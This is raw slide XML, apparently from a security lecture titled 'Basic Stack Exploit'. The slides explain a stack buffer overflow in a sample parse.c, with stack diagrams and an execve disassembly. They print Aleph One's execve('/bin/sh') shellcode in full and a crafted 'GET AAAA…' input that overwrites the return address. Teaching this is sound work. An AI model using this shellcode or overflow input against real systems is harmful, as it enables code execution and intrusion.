              <a:t>0x80002c8 &lt;__execve+12&gt;:        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>   0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a: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1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copy the address of name[] into ECX.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pP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1400" b="1" dirty="0"/>
              <a:t>0x80002cb &lt;__execve+15&gt;:        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>   0x10(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>edx</a:t>
            </a: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1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Copy the address of the null pointer into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx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80000"/>
              </a:lnSpc>
            </a:pP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1400" b="1" dirty="0"/>
              <a:t>0x80002ce &lt;__execve+18&gt;:        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>0x80</a:t>
            </a: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1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change into kernel mode.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06604" y="3208595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(disassembly of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> call)*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907366" y="3542848"/>
            <a:ext cx="1737736" cy="3843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4478694"/>
            <a:ext cx="440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(format instructions and data as characters)*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5102" y="6417233"/>
            <a:ext cx="4523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*For more details, refer to Smashing the stack by aleph one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29856" y="5640639"/>
            <a:ext cx="3295997" cy="10105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“\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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xeb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\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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xcd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\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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xdb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\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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xcd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\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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xdc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xff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xff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xff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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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sh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”</a:t>
            </a:r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8654168">
            <a:off x="2942803" y="4982037"/>
            <a:ext cx="1737736" cy="3843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36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/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="13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977797"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4653022" y="1828703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arguments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return address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stack</a:t>
                      </a:r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</a:rPr>
                        <a:t> frame pointer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buffer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439276"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4668705" y="1797344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ShellCode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean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ctr"/>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean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crafted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 address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buffer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7944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Basic Stack Exploit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104185" y="1756556"/>
            <a:ext cx="2613522" cy="3771873"/>
            <a:chOff x="664034" y="1756556"/>
            <a:chExt cx="2613522" cy="3771873"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="664034" y="3125108"/>
              <a:ext cx="8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7" name="Elbow Connector 16"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="37" idx="3"/>
              <a:endCxn id="23" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1526033" y="2442980"/>
              <a:ext cx="11301" cy="866794"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 4619936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75335" y="2258314"/>
              <a:ext cx="8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415557" y="5159097"/>
              <a:ext cx="8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305813" y="1756556"/>
              <a:ext cx="8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193870" y="1411598"/>
            <a:ext cx="4228322" cy="4143791"/>
            <a:chOff x="6146840" y="1380239"/>
            <a:chExt cx="4228322" cy="4143791"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="44" name="Group 43"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6146840" y="1380239"/>
              <a:ext cx="3859159" cy="2855798"/>
              <a:chOff x="6146840" y="1380239"/>
              <a:chExt cx="3859159" cy="2855798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6146840" y="1380239"/>
                <a:ext cx="861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29" name="Elbow Connector 28"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="30" idx="3"/>
                <a:endCxn id="26" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="7008839" y="1564905"/>
                <a:ext cx="20062" cy="2027114"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val -1139463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6166902" y="3407353"/>
                <a:ext cx="861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151235" y="1897181"/>
                <a:ext cx="1449661" cy="523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To previous stack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                  <a:t> frame pointer</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="36" name="Elbow Connector 35"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="39" idx="3"/>
                <a:endCxn id="41" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7040202" y="3321062"/>
                <a:ext cx="2103798" cy="387598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7210165" y="3774372"/>
                <a:ext cx="1896297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To  the instruction at which</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
                  <a:t> this function was called</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="12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178203" y="3136396"/>
                <a:ext cx="861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144000" y="3523994"/>
                <a:ext cx="861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9513163" y="5154698"/>
              <a:ext cx="8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03419" y="1752157"/>
              <a:ext cx="8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65429" y="1470291"/>
            <a:ext cx="4114587" cy="34083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1761" y="5707485"/>
            <a:ext cx="6913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“\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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xeb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\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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xcd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\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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xdb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\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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xcd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\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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xdc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xff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xff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xff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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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sh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”</a:t>
            </a:r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453" y="752635"/>
            <a:ext cx="683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 suppose we overflow with a string that looks like the assembly of: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15602" y="987833"/>
            <a:ext cx="319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Shell Code:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	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exec(“/bin/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sh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”)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61324" y="6319003"/>
            <a:ext cx="2804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(exact shell code by Aleph One)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38974" y="6211669"/>
            <a:ext cx="452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When the function exits, the user gets shell !!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>in stack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147851"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="185908" y="1777264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arguments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return address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stack</a:t>
                      </a:r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</a:rPr>
                        <a:t> frame pointer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buffer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1726756" y="1360159"/>
            <a:ext cx="4118578" cy="4143791"/>
            <a:chOff x="6146840" y="1380239"/>
            <a:chExt cx="4118578" cy="4143791"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6146840" y="1380239"/>
              <a:ext cx="3859159" cy="3040464"/>
              <a:chOff x="6146840" y="1380239"/>
              <a:chExt cx="3859159" cy="304046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6146840" y="1380239"/>
                <a:ext cx="861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52" name="Elbow Connector 51"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="53" idx="3"/>
                <a:endCxn id="49" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="7008839" y="1564905"/>
                <a:ext cx="20062" cy="2027114"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val -1139463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6166902" y="3407353"/>
                <a:ext cx="861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7151235" y="1897181"/>
                <a:ext cx="1449661" cy="523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To previous stack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                  <a:t> frame pointer</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="56" name="Elbow Connector 55"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="58" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7040202" y="3321062"/>
                <a:ext cx="1283621" cy="368117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7053390" y="3774372"/>
                <a:ext cx="1411532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To  the instruction at which  this function was called</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="12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6178203" y="3136396"/>
                <a:ext cx="861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144000" y="3523994"/>
                <a:ext cx="861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7114480" y="5154698"/>
              <a:ext cx="8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403419" y="1752157"/>
              <a:ext cx="8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5" name="Straight Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="1426872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0" y="5640368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847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3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31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3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1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263159"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4896481"/>
          <a:ext cx="1432247" cy="239430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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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5823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0x00000019</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="11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12197">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="105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63760"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Basic Stack Exploit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829655"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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856727" y="4065901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597199" y="1558191"/>
            <a:ext cx="337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fp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86218" y="1826843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585776" y="2112228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13412" y="2411857"/>
            <a:ext cx="208512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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]</a:t>
            </a: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[25,26,27,28]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[7,6,5,4]</a:t>
            </a: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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a: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header_ok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367292" y="17451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65019" y="2011487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365018" y="22337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68613" y="26693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66341" y="283051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366339" y="298640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364066" y="3116191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366339" y="401192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366339" y="414609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366339" y="4301983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66339" y="44572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19899" y="1839880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09486" y="2146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66433" y="2415529"/>
            <a:ext cx="1648971" cy="216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0xbffff744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0xbffff740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0xbffff73c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0xbffff7d8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0xbffff6c4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39855" y="5180814"/>
            <a:ext cx="325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in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8874" y="5512186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7628432" y="5844611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409948" y="536773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407675" y="569683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407674" y="602881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639733" y="6153809"/>
            <a:ext cx="228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i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7418975" y="633801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861098"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="405627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560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0x0804a008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195391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0x00000000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0xfffff764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41414141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0x20544547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863438" y="6535708"/>
            <a:ext cx="145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(Unallocated)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619801" y="4894177"/>
            <a:ext cx="44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out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7389894" y="508109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731200" y="4924425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0xbffff6b4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20787" y="5231509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726823" y="5547223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716410" y="585430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727712" y="619486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0xbffff69c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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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 Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}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358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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3929" y="1613624"/>
            <a:ext cx="87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4715524" y="1568922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0xbffff760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03810" y="4966131"/>
            <a:ext cx="4201615" cy="14312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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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54149" y="5403990"/>
            <a:ext cx="3887992" cy="926407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GET AAAAAAAAAAAAAAAAAAAAAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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\x64\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xffAAAA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xeb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\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\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xcd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\x80\x31\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xdb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\x89\xd8\x40\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xcd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\x80\xe8\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xdc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xff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xff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xff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/bin/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sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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4134" y="497053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(input file)</a:t>
            </a:r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7364236" y="2523854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7359689" y="355083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742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63760"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Basic Stack Exploit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95626"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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76" name="Rectangle 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203810" y="4966131"/>
            <a:ext cx="4201615" cy="14312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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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38471" y="5403990"/>
            <a:ext cx="3887992" cy="926407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GET AAAAAAAAAAAAAAAAAAAAAAAA\x64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xffAAAA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xeb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\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\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xcd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\x80\x31\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xdb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\x89\xd8\x40\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xcd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\x80\xe8\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xdc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xff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xff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xff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/bin/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sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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4134" y="497053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(input file)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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94884"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="4896481"/>
          <a:ext cx="1432247" cy="239430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2247"/>
              </a:tblGrid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0xbffff740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0xbffff758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5823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0x00000019</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="11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12197">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="105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3" name="TextBox 112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6856727" y="4065901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7597199" y="1558191"/>
            <a:ext cx="337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fp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7586218" y="1826843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116" name="Rectangle 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7585776" y="2112228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7713412" y="2411857"/>
            <a:ext cx="208512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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean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          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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[3,2,1,0]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[128,127,126,125]</a:t>
            </a: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[25,26,27,28]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[7,6,5,4]</a:t>
            </a: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[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a: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header_ok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118" name="Straight Arrow Connector 117"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7367292" y="17451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H="1">
            <a:off x="7365019" y="2011487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>
            <a:off x="7365018" y="22337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>
            <a:off x="7368613" y="26693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>
            <a:off x="7366341" y="283051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H="1">
            <a:off x="7366339" y="298640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>
            <a:off x="7364066" y="3116191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7366339" y="401192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7366339" y="414609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>
            <a:off x="7366339" y="4301983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H="1">
            <a:off x="7366339" y="44572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4719899" y="1839880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4709486" y="2146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4166433" y="2415529"/>
            <a:ext cx="1648971" cy="216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0xbffff744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0xbffff740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0xbffff73c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0xbffff7d8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0xbffff6c4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7639855" y="5180814"/>
            <a:ext cx="325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in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628874" y="5512186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134" name="Rectangle 133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7628432" y="5844611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 flipH="1">
            <a:off x="7409948" y="536773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>
            <a:off x="7407675" y="569683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>
            <a:off x="7407674" y="602881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7639733" y="6153809"/>
            <a:ext cx="228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i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H="1">
            <a:off x="7418975" y="633801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0" name="Table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769930"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="804024"/>
          <a:ext cx="1435608" cy="405627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560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0x0804a008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64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195391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0x00000000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0xfffff7</a:t>
                      </a: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64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41414141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0x20544547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1" name="TextBox 140"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5863438" y="6535708"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Rectangle 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7619801" y="4894177"/>
            <a:ext cx="44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out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 flipH="1">
            <a:off x="7389894" y="508109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4731200" y="4924425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0xbffff6b4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720787" y="5231509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726823" y="5547223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4716410" y="585430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727712" y="619486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0xbffff69c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715524" y="1568922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0xbffff760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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="150" name="Straight Arrow Connector 149"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7364236" y="2523854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>
            <a:off x="7359689" y="355083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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="4552876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23: /** main to load a file and run parse */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88132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Right Arrow 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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83929" y="1613624"/>
            <a:ext cx="87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04334" y="193712"/>
            <a:ext cx="2039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OVERWRITE POINT!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061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63760"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Basic Stack Exploit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769063"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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exception handlers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local variables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callee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saved registers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76" name="Rectangle 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203810" y="4966131"/>
            <a:ext cx="4201615" cy="14312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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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38471" y="5403990"/>
            <a:ext cx="3887992" cy="926407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GET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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xffAAAA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xeb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\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\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xcd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\x80\x31\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xdb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\x89\xd8\x40\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xcd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\x80\xe8\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xdc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xff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xff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xff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/bin/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sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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4134" y="497053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(input file)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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398995"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
